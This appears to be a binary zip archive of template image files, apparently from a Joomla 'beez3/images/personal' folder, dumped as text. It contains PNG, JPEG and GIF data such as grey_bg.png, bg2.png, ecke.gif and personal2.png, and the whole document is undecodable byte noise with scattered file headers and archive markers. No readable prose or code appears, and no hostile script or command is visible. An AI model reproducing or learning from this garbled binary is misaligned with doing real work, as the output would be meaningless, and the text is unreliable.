̬hDVk���)�컹��,1��΢�����^t�A�g
w�l'�_[G����[D�[�3}*
����quQ�}M��l�*��梑�g�*�L8'�ó.M�],�#U�t	��)F�>��~����߽[��Ӭ���y���R1��_��_�O�~�٧Љ_x�v᡻�'�V�/��c
���轌���/��6xo-�ި��H%/���͉Ѹ9^�>�!�MY�5�<��|��Ǘ��.b<F�{��hyT=�^)��D�h
g�x�έ�~z�<o�^^v��N,�؞��)W�d��:��wwH�.��7;O˴C�|����7?u�qt�͖gK��N�iO��q���3������[�F9�~�C�o$��Kco�36��ckĿ��fY'�}
�
��[�Y�x�v��4
��~���=�	c�bh�[�Y^Ǡ:DΉ��z��N6��!���L�Lv��مM��U+�]�����k�&gr�
&�8���;�L�f�yі�{�^�׼�?S^�8r$;�좡ճ����` �Jq]�p�E� ng������煮;W�V��#ڌ$���9}CT�G���'	��3�ԉ�o��ɃD�,]���]ƅ �e�3���(vm�[ȃn+�z�ڼ7O�ё�㥁Ddl�<�ڜ���x���3$53U�;�Og��9������[�noC�x�5��ʷ�|q���ʤh�_I��LY��n43bQ��|�VT�o�)��w�@��M�Meuxj�A�;�CZ�y���)���M~-��(/��z(����f��E�]��y���ߟZ�˜�=�z4[h��L��|hWƧ�J(�0�L��I��%�L��/�4���ӷv�d5uJRեpH������d��>�k�+�mgf>�+���s�
�
F⑇��|ZQ�#�V��h@~i�#�"���&��@,����x�M����'���#_��[H�_����"���K�H��6�\l9޾�eЯI�����'�,*$�4h�۹&_=��}*(�]NQ�5H�0��"f�˫r&�r�CO&�"�r��qb�3����J��6މ�]ؒ��r�@%��x�3�,�������m�B���패GdAwh�ɇ��T�L3�$$����U�n4��d}���ʹ=�V��	����e�w�>��-<VmDNtj����$�$�/�n�ūD�fB�ՖR^��#��<"�?�Y�ʉ��t�xY���~����,��"J�{j�6��9o'ڗ�k '�!ߕE�Z��R��r���0"IXD�*�N��q#ᢣIEND�B`�PK՜�\f̄VV!beez3/images/personal/grey_bg.pngnu�[����PNG


IHDR�ڿIDATxcy€���I��3N��&3*Fd��IEND�B`�PK՜�\r��ww#beez3/images/personal/tabs_back.pngnu�[����PNG


IHDR�؇o�PLTE__aOOOYYZWWXNNN[[\WVWONNVUVQPQ^^`__`]]^^]_]]_ZZ[SRSUTUTTUXXY\\]PPPQQQSRRUUVSSS^^_\\^RQRSSTONOTST[\]_^`YXZRQQQPPXXX[[]TTTUUU[Z\[Z[VVVZYZRRRRSSXWYOPP]\]Z[\ZY[PPQ_^_YXYZZ\UTTVVWQQRXWXVWXNNM\[\POOPOP]^_QRRNNO]\^RRSXXZ\]_YZ[TUUNOO^_aSQR\[]`_b``a`_a``bMMLMMMMLLMLMLLLNMMLMMMNNMNM�$��!IDATxDȇ
1P�R��&��7�I����� �\�C"`���iZ��S��0A�����$疒Ք��1g�.y�a�j�w���Z����OTo7�XQ���m�}m۳������%��;�z���	d��x\w�ĩ;p��s�zA23W$غ�[��Ʈ��&<o�ű7�y^�yޙ7·C�y��!�\AR
pJIPJ�V$�4��i�
�i�[�m��
��
��
��C/�ϋ��=�!��g�O٧ �`Y����Y��Րc5FP��E��*!�dy�G�F،�}�7�>0A��f�ۙ�V�d*��'�gӶ�G�r�ٴ3G�L��X;�D�Ķ�iv�A
��4J�HӮ)V�C]�:���Sb�E%�(�T	+��`RBU������
U���JQ���/�,��$��A@D��p��1j"߄�b��JQͻ��j��G]m�m�V�DU�k��)���lM�Bx�I�}&���NZ��
(���~�*3W��B�/慅���i�E0��Wx��b�ޱ8L��Z��AE���]�J��}�� �P+�B%�]�N�f2s�Ի(1\�vf1A�7۵}=���;Fp6A�dB5�O0�'g*g�.@������ns^5�L5�-�4�DeӴ=W7���%����<B�#0�s���)gAEC��0�QD6`� vOT�vv�zp��+�؉y�^�å�sMay*���8�Y�
��te���u���
qk��]wg��4w�&��$�s��s��,c���8�'Rucјa�b; �bX���ai@�f�x&'�As�F=��eG�z�߱�XB�����$b ���ޛ�4쥞�e�I�y����g>`�Sσ�Ks��B'Z����e�U��.������ޗ����,׽22�ػ)�.��k�e
n5�nu���=Wm�S��!S贜�~�����s��\̞�����g��Ѹ�"ޘ�t��[����Ds6�G~k�~t"�Q�Vy�YF��� �E��9"^��b[Уn��
ma��v�/#�.��ܘ�&��Ĵ&7)����
�F����aC�����<��ge�;w�Ah덹�ۯ��"���<K�����M��:/w`5K�������G�h/��g2aAQr�?���Q)ˤ�s���cs3d�#�5N)�~j��Q��t�a�-s�n�~�����1�\�UOž�ueJI^cf��h�����<B���x�秡�@�����
n�?;��e�
�\]�,ί�e��y0xD`?i/��0C���yr�HN���3�(�-����Wiۥ!p(���!�CVw��h�h+ii�ۨg���/�#ԅ
�t�_�h�j��(��s�N������u�Nr��B.��\�v�qĆ�0=C��6&`�(w6�c�ݥq�u�x�)��S]@+&�4�{�����`���r�lSv\P[��רoP�CY����'��h�X�ݣ��4ұ�U���"�go��_PC�Oؠ{��'W��9�k�rV���pl'�Ӓ�ۻi>�kUe�89�吱�M����u���O�ؓ�t�ǵ�u~j��۔}��
�@�	U����ռ�;4�%U�n��C�ߞ�4�(6SjH�cJ쟊�V�B�b}��U-S�)�e��9��vb�\��^�:ב}p���S��<��y}W�]|����F��<I�e:�.�̫���QKvZ�1���	d�"2���U�i�yJ�r:����	��+����r¼I_��0��;�߇6?�gt�Z��$��7(yw	OK-�l��/4���6��x�m�B�G����Ұ�7����"R�?�d���!5B�������752�c�.}0ߑ�܄g�D��?V�چ�`�+;{f��-Ϲȼ���	c�,�[�.����R��T-$��j�v�xDurf�\�s�LйL�FG��$�>�5���Y!h*�5�m`�lG��g�J���6]�����h�C�H���U��g�o��ɚd�I�!5I���g��3Ae=9����d���,�u~�]��P��9�rej����BF;��+��f�X8eY�.z*���TQ�XZ�Z_4��$���!��T�I�ZE*�D���P1�zP�/�X&`�
�}u~yG�F��1�|x;Y�Әܧ/`�C�x�&���N������dH�	oo�~�"��`�t��D�#6�(κJ({.����7֎M�}^P�Y���5o�6�����&��k�q�`3���e�*�w�Ժ��ci�=���bz�'F���uts�v��"����uLs��)������3��I��5�5�>$�=�ҽ�;&$�8�"���R��hn�(m5�<�m����d��A� t�4#�VW�e��`��$�Q���&8�<�ƍ��G��)���s|���X4�^�� ���
Z=�1��$&��X�!�/ϳ�B��U���c�D6��昱���K���:Gm�Hz��E� ����ޭ�IB�&-���ط���l!H�1@�v�Dj�J~���g�)��;�o'�A�-�`�s�r"���N.���e5�;��4gm�'C(�A�wr�ʡ���H"Xn l��ʫ�&i�Q-�O�������>���M���&�}�C��h�����~v)�{2qz5��a��9�c�e���pl*�v�ֺS�-���Ze֥pd��]�I��DZ12������N�F��f��4�rE_g~X�l�����\2v6�I[�d�
��&ӠYv^*��x�<���ݛ��93���,��f1�Fݢ�u����%,!F�S�,+��l�R_�O�����H�:D��]\�A��uТ`8�Dm��n��ɚ���|%�m8�B
Ō\�c�X��� ~;G��v�,&g�1뾱de2�ǕMm�G���2�N6U�2Ē&��;�l�tM�4Q“Q��!\���,Kt�}�)[ky�1;I��F�h�K���J���?�,`�k�J�ؒ�ή\��W�����_,-`'%�ۘb�n8FH�^��ikL�9����BM�ki��:�&ȏ�۩ug�|�������4x\�l1D\=.��U�(�M�h>�+��\9�s�S�@�3����X.˹�\�X7b��/K��b����K.T}�g�h;�Rh��e=$��v��
Jv	�N;�+ޡ�{�KAN�.�%#YNѡ�:���qb�$�
l�/��Ib�_�S��c}��q���&��Ԯ�1�f��������A��yH��5�G�_�<^I�X�3F��I�z�Fn��yu}R���g�x���C�������h̷}��
��6���X��I��GϚ�<�ko	�w�=/�t"�*��ӓ��+m�DMv�q���D%<�Ѷ�I"�m�O�=���҅��#�w��3U��C"+)&����eA%��2‡$�{5}*c�b�^�,ziG����A�97��B�7���^��6�f>�i�		w�\��ex}��ԙ���>��p��/�yȦ��Q�}7̽D�Lw8���~��+g�MD��v���'��t�c��-��D��F�H�+d�[��$�(���>��,�Gj�4��w���i|u��]����c���YMZ7�en�VevA��p)aD�x���;�Wo>�*J�wCq>��?�Su��jߤ���6V���:6�qN���&���6�%��	��5��I����;���l�3��*L�X�Q�r����I�(�
��t�i�l�ֲ��8jI���P��LN����c�\F!-${��/R�Wٌ�����%��$�,˨�v8�a��\��|�.k6�rH� ���_2)�d�{K3#(-�nǰ�V*��/qb�gI*���W���lS�ُ��B+)@����Yg��P�넭ӗfp���j�*�,x���%5Z�
�2-Ic�v]��wh3����:%S�L9TTg�h{�>[�����I�'�����<�l�z2�kQ��kA��o��׮�'sll�Pm�9P�U6m�t��p�=���&&��?��"ݩ	��"�B�^F��7o�/0��w<L	18���>�ⴲR�}!(��i��:�[�~�d��b�~���S���H��d����ه@=5�;N�Ƽ��?�� &�W��i���3�Eŋ����i>RL����ǜ��/�ࣟ_LU�t�
>"�.��f���k�H���-��Hv�;�j�7u�ۺ�N>
�|���SO%�%{��/~a�E�7<[UI*�[ܱ��k�N���J����v[���(��<�h(S�=��15�IV~���l�k�숛Ћ�D��Z�ҧc�)��j�NNce�ݟ�:�/�{��-I�IEND�B`�PK՜�\�#d+
+
beez3/images/personal/bg2.pngnu�[����PNG


IHDRXUR6�PLTE���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������Ü@�	5IDATx�I��0C��>�w���r��5�������W��LI@i=E��8���n�Ψ��J�U[���jL0sN_FuӧE�	��P�T�kW��*^Ѹ��x��t>�׃�<S�^�y��j���E�/r�+#��9�ɼ5�j�Ҝ��n�t�6=�U��վ�p�l\6���vQ�a��c\��y>E�ʿ(g&�XxVoa�N��xp��#K�q2MN@#��ٗ�D��{|Nр�
�7aڿ��_�gÖjCۅ��~�O��p�

}
��"D3�\0g��Ȣ��AN{O�ԌP���"Ѱ��߀��;�^�lc��تpr�Yu�Q�����&w{��h;�`<�!,˙i���n�9��"Ύg�n��q�w����u���������J\���NE� ��/~��"(93�s�(f�Ǣ�������h"U)�E�au���
_�[���coћ�c�x�r��m�6�m�����g�v��q�z�Z�<��*�mc7�q�m�p�y��3��|��n��m.�*��U7C
C�}y��ڂ	���c&9<�T���(��)��6���;�9
����{c��8Afro�6ޢ�_oX����}���fuK����>������ 	�Y�:V�#���9���J҈�I��c��\�`W�T+!�	�K�!���m5-<�o�n{��(II"z9�A��P��5j%��L�5�&��{�(�OOyt�j��@�rȟ��Ɠo�Ƹ�O\iQ=�$8l��Y�3��<1�NG�
�ʸ��Vr�ԏ���%P�f)�"pS0M�=�K'[p4�*t�%q5jr�I[���z��$Sѵc*��B�r�82�l%���c��M9[��-�0[�Zh��H����!���yGݝ"j��V�@��D���3�z���V]cn|U�QӕѢ�������UW�no}o�>0����{���zR�S���]���O�C��JM�J`0���3��N2m5Ѐ^/T%��z����%9�ș�Q�^��R&'�TzS_���0W��p_�pi�,�����~z_���]��1[����!�4\�]}�Qtj�)���*VZ���θ#˭�@��
�"#�`
���6�QugF����D���I{X���=�~�Ր��o����C$��>}d�v��ٓ�G(��c��}��`��A �s�c2{�p���ãǴ\���K��

�Nv7GOҙ]է����P�:��`�j�TYI�b�i���c[�fgmΗ�[���m�|����Yar�L3Γ+д��&�"�0��'�����^y&�u}ь'����I{ӟ�92IQ|�Rh�U�����Ǐop�7�����i&�0]��KA&Bo�N��x)YW(#�lZ[cϸ�+���՚{�6�xJ��z���b��\WCh�0��U�S[�)�6��[q��?���~����I�vL��"M��R�՚�ju��J&&��0Z��i�l�m��+K�k��3���Z
���RMɷ��ʨ�	��{�w��Wv�����0$�ۧ���n���r��/�^d%~o���>����E�8�*�j3?z�UD͎��1�_�+��3���f���9��ju�w�I�����|�k�_���!�o��L*2r	�dD���d�Cg�(�10�������55� �_�p�@�a��G�o2-�B��F''by4@��Z�:Wkv��We��v��_����aܠ �ga�96@���b��2�ՙ���"v���d'�L:��TRP+�N&&�D_}ͮw���X���F��2����gX�5�?r&U'_=-3�7g�+V��?���X�I�N�[lk�Zg���hRg�a��^%g�QD��hU|�?�9z!l�&y����dJ�H�{����b��A^�O�9ůS�un��['���y}"��[��'+}�hp�`�����	u�\�!w��'�}��zu�~]�y���-���Ѱ��`vfL`��
���8�[?��f�^э���˘`�F$�[u�3�N�3�5)�Y�q��έ?��wV騅^,ai��*`@^�T�h��d��xS�E��,׍=��qK�9�2T)˹,M�q1]ba�q(e�s���uʸk�\t&�J&�N�98��e}<�s�\�W@ɱ=4@�
��9G�Ŏ�bH�x����}1�E.�w*g�6@��Т��Q��q�1,=�$� ΄j�,�KI�0Ǵ�~��������B��ظ���l��L�4"�:PPX*T�	�ܻ?�s��L-��[:���	��2�庅`!N�������^Q��IEND�B`�PK՜�\W�44(beez3/images/personal/readmore_arrow.pngnu�[����PNG


IHDR���IDATx���z�F��Q܉��L��L���7`l�W�zo���zn^�b:˲$I|�?�N���s���e�Z��!
�x4��0��r�ާ�f�Y����oCS�� �C���^�����)i��,k:y��8��<�7�5����2M��f Y�j!����[R�Td���\���)E=�0�ܲ�Z[�A���Að@�>�yٴ$�}{�FaH��i�0�}�g3(],�x
��?��rپ%�Q��?���I���-�IEND�B`�PK՜�\�֢� beez3/images/personal/footer.jpgnu�[������JFIFHH��������Y
ab������?��ݮV�p�k��\^_d�/�W������o��}��`�@���V��
�|[o�A\pp��W^od�7�W������G`�;���.���[��
ݮV�p�k�@���.��)t4K�� U�@*� y}�
������
�|[o�+m�
}m����������8
��+���
���^od�7�W����PK՜�\��TXX%beez3/images/personal/navi_active.pngnu�[����PNG


IHDR�&��F/PLTE^^^i�2IIDATc�`K���bIEND�B`�PK՜�\�Y�pp%beez3/images/personal/arrow2_grey.pngnu�[����PNG


IHDR		J�Λ7IDATxc����@B��p�� 	��PT��v��P�Z�bg(G�!K&NR{N�IEND�B`�PK՜�\o$�99beez3/images/personal/ecke.gifnu�[���GIF89a�&� ���������������������������������������������������������������������������������������������!� ,�&����A,�Ȥr�l:��(�@�Z�جv��z��B.���z�n����C���~����~������������������������������������������������������������������������������������������������������������������
H����*\Ȱ�Ç#J�H1!��3j�ȱ�Ǐ C�I2���(S�\ɲ�˗0cʜI3f��8s��ɳ���@�
J4���H�*]ʴ�ӧP�J�J5ꆫX�j�ʵ�ׯ`ÊK��ٳhӪ]�۷p�ʝK��ݻx��݋ׂ߿�L���È+^�x��ǐ#K�L���˘3kތ���ϠC�M���ӨS�^����װc˞M���۸s�ލ����N����ȓ+_μ���УK?ޡ���سk�ν����ËO������{?�������˟O������ۧ�����(�h�&h`6��F(�Vh�fh!v�V� �(�$�h�(���,���0���4�h�8��<���@����Di�H&��L6��P6	”TVi�Xf��\v��`v;PK՜�\�0$���beez3/images/personal/dot.pngnu�[����PNG


IHDRKm)�OIDATxc��@%����; 2@��o�V^���?�P	��u�Lf�a���܁\�ĆV��>��
"�Q�-�@թ�k��IEND�B`�PK՜�\0�Cj.beez3/images/personal/readmore_arrow_hover.pngnu�[����PNG


IHDRexQPLTE�����ꎎ�YYYkkk������www��������������޺�����yxx�����������޽�����A@@\]]DDDH�jIDATxeNU�@\z}����������M��曋zt-<�\WУ����t�����T8��Zw���_z����s�o�&��=\�㐟OP��oO�<����-zr���/IEND�B`�PK՜�\�]��wLwL#beez3/images/personal/personal2.pngnu�[����PNG


IHDR$ [�R�PLTE4H&U�V�P����L}��k����)d�X�L�c�OZumv����e�;u�R�2l�h�M�,i�J�AqP�
^�?nN� F:Fd��Eu��O�Z�Q����]���
Z�����T�CtHzU�I|C{���\�b�3_Q�
V�/ZM�W�������Gxj���G�AY'N�/X��+U9o�*T8f
&O6q�N�K~$LO�$R���
"I���
Z�*p�'P��+`�<k#K2^2\N�'LIQ�R�J|K~%N6d�:k�)Me�+6bV�L~>s�.UK�����P�%M
*Q	%H��o�f���	[�@c-X��,R1g�4`6d&G!H5a2[|&>M�Ev1\��:h
I���T�	#E!H.Y|J}L�
'Kg�h�g�;i���e�$\�p�Hxa�H~"l�"r�b�V�Q�T�Z�<j$i�]�%a�?x�?n`�+r�!f�T�$p�R�m�Y�i���P�Q�1t�Aq)L���D}���Cq>p]�N����*8XJ�H��贸�^�5b��?v�
%L��
+O����P���@dS4^	&M	&NM�
(R<
5��
@A
3@k�
_{*).��Wq������8
-CX>C~�p��� 1��x�*;!%7.Le ��Dt�h���<
B��E��~��Q�I2IDATx���u�Fa>1=����A�ȔAq'Q"@h�&��3u7nw`�X�b���/dX�[%��.[
� ��۟��H�WR��a�a<K�'	�8�[��W"{����f��vy���j������}%��V�%� ��0C�rK3*A$"*Q���jh�� �����J%����	D��q��i�q��D���IC7ت�<�JL?�Tb;RՑG@*QN~����#`_UEя���¨�k"0��ݤ ��j"�^��a.1-�<fV�}��%n*���k�D�U���P�"0�*"1}aT{$*a��[^9����$"0�8���A�בG@%�M�Tn��Y�Ch���s�q[�FUR�5e{��(\ߕ���N ��Ж.�qG@�Ÿ۱T�;^�4uܑP7b��+�7#U}$n��e���N�FUR�	D�Gv(O�ۍ�*y$�"���8-���+u�P�5�^nN�۔�Y��;������^�����"0����iy��HS�	u#�����%���	D�׶<)x���ID`TuZ�fss	"?P	�]�
>�B��H�T�0}�ǫ�MU��������B$����5��PKa�}Z���^�ҕ�~�\�F�sc��,���\X��$"�@%�q}Wj�������ㆶ|,��
�H�ĭ}hx�Z�
�H������i";P	k\vx,��+MC$�*���C�s���J�~~Uh�c7��o�D�F�KUۻY�Y�54"���Tp����^��2@�U�ۨT"+�4D"n@��1t�J\��H�
hD���*���J��[��p��
�H�Dvxj�n�6
����s�c��UU��H�
�b��Wkϱ��D�/����HL��D�|-^ĸ~,�
¨�7�"���q}�P�D*A$���!�{�T�*A$b*�ܵ]+x^n�O$Rn��z����f�x"�P��R�Y+�H�T�\)Xw��D"n��¹y�RP�gK$�x1��?U*qwV�H$��6+SU	 ��%�n�竅�aTE$�x����GUDH��|��K�K	 ���!_�*o�\�HI��r돡����P�mUn�0�"@
�8�2W�/U	 �H���R�{a��.�?�X�1װ�����B$���
]��̌�B$�n�k��2gm�`�s�\��r5V"���(���v0V���-��r
�qG�X�\6�
�]�������
ʱ7V��B%�O�QUo,�R�K�c�b6�
��%��%W���G�Hx�*�p�K"�0�8�h�*!@
��?^|ko�	 �["+_4�����K��qJ�]o�	 �J�^lFg,�R�Dո%wc�	 ���^�so-��x�ꛆ<�%�����MÔ9k���KU?ػ�6�,��uɈU��	��Qp_N�&#]B�8{	�
�&��dS5� �I�
�Z�ۜ�֎����\��nR86)isb�h�W��V��bZY2:�g	D�O�8=��ġ<��J�ü�D)�T�ߕ�v�aKV�~u��*D����7*?*i�کW�旪�R\��+Q�m"n*����+�H�����U��v�Q���+�o�@$��׿��
7���z|���/U�"xRU��2B٣J�bQ8;ld�0�֋�ͲJ�{$`/{�c���]D�">�_�W��,Y����r�^�xv����u��~�+����a����m�Dd�J�h���2DW/��hQ�9,sfSFl��(�[�%��IV	D����c���l����)�d�Dt�|E�����H(;�u�e"�Tu� �z�a�Sf(��h��j�˾m���2>���w�b
#�J�3��/`8)ݒ���q����O���'O��|Q_?�F���*�_����Ҋ�-EpY_��)1���e����L�O$&?p�{$��øR_�6B��|~KՋ"AKcqS/�.��R/z���j%����Y%VW��1'�J
�I\�jj�,!riE��6Zt��5�e�G���
�/p8R�A��+���r������)(H���{��+Fl���dG����$*O�z�="��y���N{�j;miQW��bhޫ�S���ş��������)r�N�;�).�c��%���>��i��;I�;�,T����� �{�;K�r\��z�i�O�,�8�x;g�ńGD~���X�̧�s�w���n�{f=#�,q�
gU��
c7{/�H�k�Μ�HYZ�N�E/�$v��X�H����w�;���"�d�h��K�ȕ\�/�D���T�W%�R�K~�9/>��w������q�Y���fo�2�֒�ȗiݙ3�0~�q~5�t��G"n;���<�{����۷�?FΒ��H��);b>���b��ngM�HA�竱Ms�s_?���r��W"�%�w��vv2����K����.'��IC
�~�9�,�"�����/U9E�"�D�m�����gI��ȗ�R���2΅�Y��D$J0K���[0����<�[����o�KI�c#HY��i�q/ध{�J��/xt�����]p�~<<<Lb)�t$�%W#0י/&��^�q&��}g�#�ng�`�ݢv�u�<>kI+oĴ��(�&�>	鸗��N�Qb�#����;n��K�H�8������1u��z�K��p�ýۈ@*q�|�]"-R\Ƴ�e�J�ߒ>e���f^�$�����J��k
��$�T�.�ڞm��Q�Ɲ>�,.%�mY|��
-���ƽ�9��{$`��F�[%�u��ӑ����Ņ32f�o;y?����c�=��"P�J�{0y0�[-ȷ�� O�n�vv�mW�K�O�SwX���#D����ᨺ�Xģ~�zv�0v9��IԒ�q����WL��iq�eev��t$m�%�UF��M��8	.�@$��j��`�N�(�Hj��O")��E�j��"n�콈�=� ���d�{\-p"[QN�TZ��Z	��m?M<"KV�A$n@	\�f�������	�"%d4'tأി���L�v4�{%:r�E�	(�[��Y�y�R%�6)���G㦭�#{T]�ǂ|Yuc퓲e�}�~?"P�J��j��1v���8����Z����=|³g���,�#�t�j^��S�oK����OW�&3�i�{����q��	�ߗ	��(W%�w;E�1'�Y���D: ���m/?dtfdh��?���ٗ�سPO��+1�]ў�i���s��<�v�<�����b��_B$�\���NQ�D����s��l>8,�)�/(!����2~?"PVO�'��p`���Gͳ��„���7T��l��t�F�� ��%��k�%���TEڟ?'��)�ya�1�2�.L���D�}b7��S�"w~W*=�렶%;E��^��N5���C����H��l�81WjE�W\6�.LlM�1Q���E�T{DkMgw���3�@�*qu2����T�f��t�V�w���_�o���-i�
ȗm�Ok�D�*q5kE��Z"�KQ�����w�D��HH�H��_;��d�ϲ�Dv��V�7���H{D>�=
X��i,�d�q�|������?{6�%�i�V0�Y�v�l�pw�%}}��E<�[)=� e�����VЏ�q��z�y$d�d�V'	aFQ"H٦V�I��:�g�]�D&�l�H��Nmu'��-<[�@$J��v�J}���*}�����Y��L
�rT+bTB�Wof'���+�%,�p�f8u�46f�5i���eZC$6��i�7�)[�²7R�d��\�H�@v�Ȯ^��fA����V�-��z�
�~��C$6��o��f�qq2�I�r��="��V��=YR�Gof���n��䳽���,�ƚ�"����9�$��T&2M<�q�C�CDb�*�ģ�RU�hЌu���m8y	"��'�Ʉ=n.i$��R�"��}�H|����|/q�NsɎ��ZS
"
X����!�ɬ�'G���,�0��a>y:�y�\��e�r��8v���� ��V�-ml�Hy��F$6�7w'ø�����K�r�H[��|"� 
P��q��#)z�eK)�z�H۳�}D`S=��g�Y�ag1J4�cf4��]���pG�	�M��W�Y"y����f�C8�Vl{�|m]��^�����_ٝ��[E�:�!�{�a��"O��M�č��x��0��g�������>���Hl.@%������u�Ռ��X���R�)Dbc*�߽<9�
�+�A̽$�>����	�M�K���ݝx�,_G�qHd�BE�	�M�%��'qcP4��;H�z�g�5	�M���qu��M�B"m�n
fFR�	�Mt�ooN��Π`G���&�i���"����&�񕛓$mvFP�
��?s��H��E��,�{:,�O��>��]�B3@$6��^�=,���HY�5�5$W�h�Hl.@%v'��V�����Y1�|6n"�|�؝�����'r�(B$6�_ٝğo��)!�%�`�\{1�%v��y�G�6�k P���k�e�P��6�"�ɮ]�X�ǰ5h��R�"�J�q���JLm"˴��*��]v\�$�/�"s/��*���HF�D���vatX�H����.UI������}ibj�;��f���߾�
�K�������x��=��|������%P�|�8M���x�M���k�J��H\�J�ӎt��� �%vd��D�7`�����^�5N��*�K;q��H|6�o�v��.�T�H��g�ˤ�H\��M�^�W`�}⿞��W�cD�'�p�3?x�+?>���/�_E$��7�F�4��,�!���(�9���� VN��]fu]��{��+)�cY#k���"��6x�\zB�W靫��{�i�de{���7o�bׅ������.��!��Kg��Z�r��kCv���zI�==��_K1[��03!���T�$�0L�oY��幧������=$�t���<�DĈ����)`���22�3|:�1�.�
r���)Ř�L�x援玧�ނ%��?���$�㎖��<О�����~�#`�X������=��s�@�P<v�R�����c+,������d�j��\	�j�K�f=�P
b�^�d�6*�-_up���#&K���%���.�ޜ^Z
��p����D��rJ�:H\v��Q��/I��
A�T�Џ�Κ���̌�(���(I�ZЛ!{N�ۆn���)�M��=���_>w�I�7+�IA��3���R�ɛr�h�~��)����N(M�a�~N�=�J�Q��1�A�'
ba��m�S38iO����q��'lX����y.��F�@Z %�fҗ�ˁ>�d��M�ZمJ�uAJ��g
��O�����%a�Lp�%��o�鐮�l7t؉ik:��\A�PF7v@!(��n��N�os��
dž���9O>��W�>��'��S����H_&A_n��&�s7��O�0�bى��>� �+�^�:�C����ܪ9I
<�n�C�;�'�ha�1��e�5A'j��2��@
2jw��9qq����d���*=01@������T��8܍E��bg�,*�S�2�$�:�7@�@h<;��(�j��*X�:��h���#%�5�e�9[�-@�B7�Eq�x�=m-�ǟ9�%�#�f�y5�S��n4e$	_�w啗7���}�"�����<���& 9<$F,DP�@��Bt�#ʠ�C�"��8�
�"�(k�ZiameiTh"��p&�']
����P�O�M	��]׌�q�6��x���D����[�0Iq0e#�V�@�F�F@�]P����� �<x���67�_���i�J5�׏�7,�)E�?�4|�D��8V/�Sx��k�@�����B�pB���hw�"
ze��1\`��
�s�`Y��X����1L 
d���"	�o{a�
��w�sD=�a�a4�М�f�Q�X�jk]��+]��>�CED��Y���᧋F\�W�/o�W�czG�ِ�M��|�d2���(�-��E"a �f�Q%�M�ܣH�TtS.��隦�5M+���e���ZS�&(���B�7:-��A!stD���V�9�9�J0-c��.��a%�̳�B��2�a��AlC[C�go����c	X�W���)	�K�;z�I~^n�aj�o

���[J��hnt@�MD�B;l؋SJ4zO���Xrs��{6�R$���r���&�0
��M`���
ސA�'�ى�dr$��f�R3RT�c�V3�5��F5%մ(6�W.��ЪZ�Z�\�V˳�jK�YAY�c�C#vWj��Pm��uyC^�@�ia(>V`����{�C{��@0c��#�����-�9ct��⇷}��C7vvv�������K�G�ǝ���0Z�FQ�A#FY�.�Z�M�k��m��Su5��>%
ƈX|-�6Av��LD<X�V�����Z�7��UՋ��ӄ0V8���P��@>�
���%A
�i�e�	$�i�����j�%P,�*�6K�LQw�š��Vf�)2g�=P0؀#�
�n�c�(��;�.QJ2=��
Y�+<H#�����0�6�q[/�gHbg�; D��󧎞�&)(�Ietj�2� # ���*�U��
�
��uP����:��~L�A	Ztp�&\�#!��'���Kp�>h!�E�T�R(�y�}�f��	'�ʪ�B����e5��i��Ԕ��b/aKf��H�$��D���؟ɤ29�,���}��oJ�R��8�e�(�9T��N��M#�Rm�$"(�tDW1=�����,\�!2�
��9��Y��d�Á�	F��M�TA��J�ƸH�Y��W?�_Ky>�A�ʈ�ޘ��	/�#!*8�찈𦱪�(.���-�(��b�X]ՕEWUn?���sR�Ya5���l&�=~��zH�ɼ�:�B6��\����U��B�K��T�_C�R��pB��@��
�L&��dc1�M�i����1D��=�T�'�d¤���h
m�JX��BX��7��F�Z^�^)��^��M	[�j���
| H7�C�*I
�:b�P0bw�yA�Q��L��D��8��x�EE!�b,qg8u�����Mo�~b����p�'X�!
���
{��'�x�11 D�!U>+`�rR�Be!tM�Ԟ�?i���؟:D��C����1�`���_�� �`b�T;W�WFVW�d��Kq�AiP/6�# ��W��T$�9R0=`P"��g��s�T'p��,
�R�+�Y�BS��E�����S���>X[�b��i3�1[�j���Z��DثK�M�9DL(��9_��{�8 h�Xp#urG���4Q�|>�9b�����u��$\��3,�a
���Egqvp�
��������2�
�T����ĵ�lK㱂	�
h��#[�)Z����PL���Fܐ~�4k������[l�GN�����D�Vx~���f�13����>�wn]�*�V�8~��\U��#������JT٬öB6V&&
�"���0/	ԂR���-�,#TiA�d�Ȃ!�j�i/ U*�V+��A/�(�b���e3%�u��v�YZ@
���XZ�Ts�$���N��Q*a��|a�/:��[�Ҧ��
�B�/t����X�l�ll����x9088ׁ��/������6 <�@`�VA�2@f��W��q��Z
�1p��N�А?g ��0��W�z,;� ��R	��P�^��]��������k�R�8~O�)�;���l��_-(#l���>ښ~��\��M��V��4�`V��n�UX�+�DI����X[X���.��/8� ��JC<�=X.0����Z>�b���۲�BEāb�j[�#�Z�.k5L���v�^�<�7�8Ͳ�'���r��r��m�yf��������O@��P|��Wf�R^ĝIx���\����
���'?�����>�PHcS/B��lŬ�4;/��cP�0e�+?����)�G|��GY���g�c<�\
�Z���}��'S£�P<����j�6�6Î�	&.%�����}^Ltt( F &���f�B�B:��jO.P#��V8�T�^�
Ԛ��k�~Vh�:��D@����"��t,_v�<Qi.Z���)�!�.���8�;t0����Ԑ@�foZE�#<��e��*�� lS�M�H``�!��,�9ƃ�hQ`w����i��y��Ǝ���Ͽ�K<dh�� �]��i&(�D6$��g�
�9������;���G�t{ll�d�����ݻO��5��fܙ�s����gn㌘�^[ۖ�z����?����o�r	H�/�_�"�-}~������JՇ��o�vy��|��AX��@m��A�o4���I��_B
0C���`�!� �����˱D �2`?���D
�Q�7	��>�
�Bǯ-�����J"�1���\�*�+�íX~/܀VD��:��K9J��fK����uPY\��~�����Y�S�J�ݵ�H �7X��"���L{+�W��0�<�X.`���Ă�_ɥ�a1�`>��_������c��S���;Pb�!hA:�xh`|
�ln,7������7
�,��y����1������W�N\]���ՏWW��N���9�}f�ଞ�'>w{8A�2^��?����/߆[��!S�%WߟՏ�_��	�KI}�+�[��>���~�iP<H�E�����AE�G��]cM1�3x��V�l�-��ѭ�}0��Pq1�"������k�?1���@-D�9���-���;��0���k�=�X�3��H$����L��('�����R�qTZ�A7�@�*��G�t��ЕE�	<����Qs��3��@u��Ͼ!������TB�/T���tے7���Vl6Q0n�m�T�_�
�ƍ��k��"ԕ r��X�Y\n�A_
��H� �o)��Ϡ�`
g �驤���Nn܉�G���8^��8��
�6��PO1Pf,�;���qI(�^e9��\r��ꯘ�շ��S��0d����'�K�\Cc����)VŨ!c��
06v-&Өtt��DK	��
